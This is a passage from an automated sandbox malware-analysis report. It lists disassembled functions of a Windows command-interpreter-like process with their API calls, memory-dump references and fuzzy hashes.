                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :
                                      • API String ID: 338552980-336475711
                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction ID: 2d0016b0763a197c1f25ec152b19339566973f95dd34a8cf6da0d82f619cd5d3
                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction Fuzzy Hash: 1EE06DAB618641C6E720AB60E45106AF7A0FB8DB58FC81525EA8D83724DB3CD249CB18
                                      Function 00007FF755CB5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF755CB5B52
                                        • Part of subcall function 00007FF755CB4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4297
                                        • Part of subcall function 00007FF755CB4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB42D7
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB42FD
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB4368
                                        • Part of subcall function 00007FF755CB4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4380
                                        • Part of subcall function 00007FF755CB4224: wcsrchr.MSVCRT ref: 00007FF755CB43E6
                                        • Part of subcall function 00007FF755CB4224: lstrcmpW.KERNELBASE ref: 00007FF755CB4401
                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF755CB5BC7
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                      • String ID:
                                      • API String ID: 497088868-0
                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction ID: 95d59afd5feec4c2b001340e9742b648a7e3289d150dc7d3ccd9095fd8b9787b
                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction Fuzzy Hash: EF31B5BAB0C64342FA24B711A45117DE291FF89F98FCC5435E94E87B85EE3CE8018720
                                      Function 00007FF755CB3A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                      • Instruction ID: 5cf9f35596c6074769096066a22fe8052a00aaaa12214e51ed03916ac5d2ec50
                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                      • Instruction Fuzzy Hash: 8901F9EAE08683C5E754A755A440039F6A0FF45F98BECC030D50D83244DE2CFC828360
                                      Function 00007FF755CB9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskmalloc
                                      • String ID:
                                      • API String ID: 1412018758-0
                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction ID: f090eb7926ce24c860bcb84f1e542b3b97e04b2420b2439611bfda745a8b02d0
                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction Fuzzy Hash: 65E092CBF5930791FE143B62684117892405F18F68FCC2430CD0E09782EE2CF8918330
                                      Function 00007FF755CACD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction ID: 44706e5a77077c0b5c8ddf152b709d7bc288a67bd0d79f9e1579c805c9462ec3
                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction Fuzzy Hash: EDF019BBE18A8386EA45AB15F84007CFBA1FB89F44BDD9438D90E43354DF7CA481C620
                                      Function 00007FF755CB4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: exit
                                      • String ID:
                                      • API String ID: 2483651598-0
                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction ID: 81f9d75822dda14730cadf88005f73625eb9b3c07ad1d6ce190c222bdd2c60bb
                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction Fuzzy Hash: 4DC0127670874747EB5C7731249103999555B09F15F885478C50681281DD6CDC048214
                                      Function 00007FF755CB5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DefaultUser
                                      • String ID:
                                      • API String ID: 3358694519-0
                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction ID: 97cec5db0f111e631af2bdd3643167faf7dbcda2662f1e2541dad4e1271ff61d
                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction Fuzzy Hash: 15E02BFBD082938BF5943B4164413B49953CB78FA7FCC4031C70E022C4ED2D2E456628
                                      Function 00007FF755CB2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction ID: 08bfc19c71f091ed5aee499db9d885408c3def87804c3ff2857b07183fdd1771
                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction Fuzzy Hash: 44F0BE66B09BC240EA409B57B940129A2909B88FF4B8C8330EB7D47BC9DE3CD8528300

                                      Non-executed Functions

                                      Function 00007FF755CC7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F44
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC7F5C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F9E
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7FFF
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8020
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8036
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8061
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8075
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC80D6
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC80EA
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8177
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC819A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81BD
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81DC
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81FB
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC821A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8239
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8291
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82D7
                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82FB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC831A
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8364
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8378
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC839A
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83AE
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83E6
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8403
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8418
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                      • API String ID: 3637805771-3100821235
                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction ID: 2d25489c8d181c2dc94be42cd86b9f12feab3f75d1d1712156a6a443c460aaba
                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction Fuzzy Hash: 14E194BBA046938AE750EB51E40417AFBA1FB49F99BC89235CD1E93790DF3CA445C720
                                      Function 00007FF755CA7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                      • String ID: DPATH
                                      • API String ID: 95024817-2010427443
                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction ID: 17ec2e23ce6083fa4e86844201c20c1a3b0f398a8662be62575ee5a4599a0a5b
                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction Fuzzy Hash: 8212C8BBA0868386E764AF11A440179FBA1FF89F59F889179EA5E47794DF3CD400CB10
                                      Function 00007FF755CA6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 1795611712-3662956551
                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction ID: 458b22ada00aa02fd7f885a4b2b95b088bc0633d77c8d99afef250876525c204
                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction Fuzzy Hash: D3E1A2ABE0864386E750AB64E8401BDEAA1FF44F8DFDC5531DA0E47695EE3CE544C320
                                      Function 00007FF755CCEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsupr.MSVCRT ref: 00007FF755CCEF33
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEF98
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFA9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFBF
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CCEFDC
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFED
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF003
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF022
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF083
                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF092
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF0A5
                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF755CCF0DB
                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF135
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF16C
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF185
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
